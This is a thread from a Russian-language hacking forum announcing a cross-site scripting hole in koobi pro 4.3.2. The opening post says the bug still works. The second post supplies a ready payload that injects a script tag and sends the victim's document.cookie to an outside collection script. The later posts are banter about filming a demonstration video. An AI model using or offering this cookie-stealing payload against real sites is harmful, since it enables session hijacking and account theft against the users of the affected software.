Межсайтовый скриптинг в koobi pro 4.3.2

Discussion in 'Уязвимости' started by KLez, 27 Aug 2005.

  1. KLez

    KLez r00t

    Joined:
    17 May 2005
    Messages:
    19
    Likes Received:
    0
    Reputations:
    0
    Найденный уязвимость позволяет удаленныму пользователю своровать cookie пользователей.
    Подробно читаем тут
    PS. Бага пока реально пашет . КЕЗ если есть возможность сними видео =))) Я не стал т.к потом наехали бы на мой проект ...
     
    #1 KLez, 27 Aug 2005
  2. Mastermind

    Mastermind Elder - Старейшина

    Joined:
    21 Jul 2005
    Messages:
    50
    Likes Received:
    4
    Reputations:
    5
    XSS:
    Code:
    "><script>i=new/**/Image();i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;</script>
    P.S. Только один вопрос: такой подход сработает во всех браузерах?
     
    #2 Mastermind, 31 Aug 2005
  3. m0nzt3r

    m0nzt3r моня

    Joined:
    22 Jun 2004
    Messages:
    2,096
    Likes Received:
    673
    Reputations:
    591
    а может я сниму видео? можно Клез?)
     
    #3 m0nzt3r, 2 Sep 2005
  4. GreenBear

    GreenBear наркоман с медалью

    Joined:
    7 May 2005
    Messages:
    2,547
    Likes Received:
    1,398
    Reputations:
    612
    да какое там видео... как в форму сплойт копировать...
     
    #4 GreenBear, 2 Sep 2005
  5. k00p3r

    k00p3r Banned

    Joined:
    31 May 2005
    Messages:
    430
    Likes Received:
    8
    Reputations:
    2
    И вправду какое там ещё видео делать.....
     
    #5 k00p3r, 3 Sep 2005
  6. DRON-ANARCHY

    DRON-ANARCHY Отец порядка

    Joined:
    4 Mar 2005
    Messages:
    713
    Likes Received:
    142
    Reputations:
    50
    Как какое? про то, как
    =)
     
    #6 DRON-ANARCHY, 3 Sep 2005
  7. m0nzt3r

    m0nzt3r моня

    Joined:
    22 Jun 2004
    Messages:
    2,096
    Likes Received:
    673
    Reputations:
    591
    как хотите)) а действительно чего сниматть то..
     
    #7 m0nzt3r, 3 Sep 2005
  8. PinkPanther

    PinkPanther [ розовый мафиозо ]

    Joined:
    16 Mar 2005
    Messages:
    280
    Likes Received:
    75
    Reputations:
    85
    Да Вы заИПали флеймить уже. Всех в бан )))
     
    #8 PinkPanther, 3 Sep 2005
    1 person likes this.
(You must log in or sign up to post here.)
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.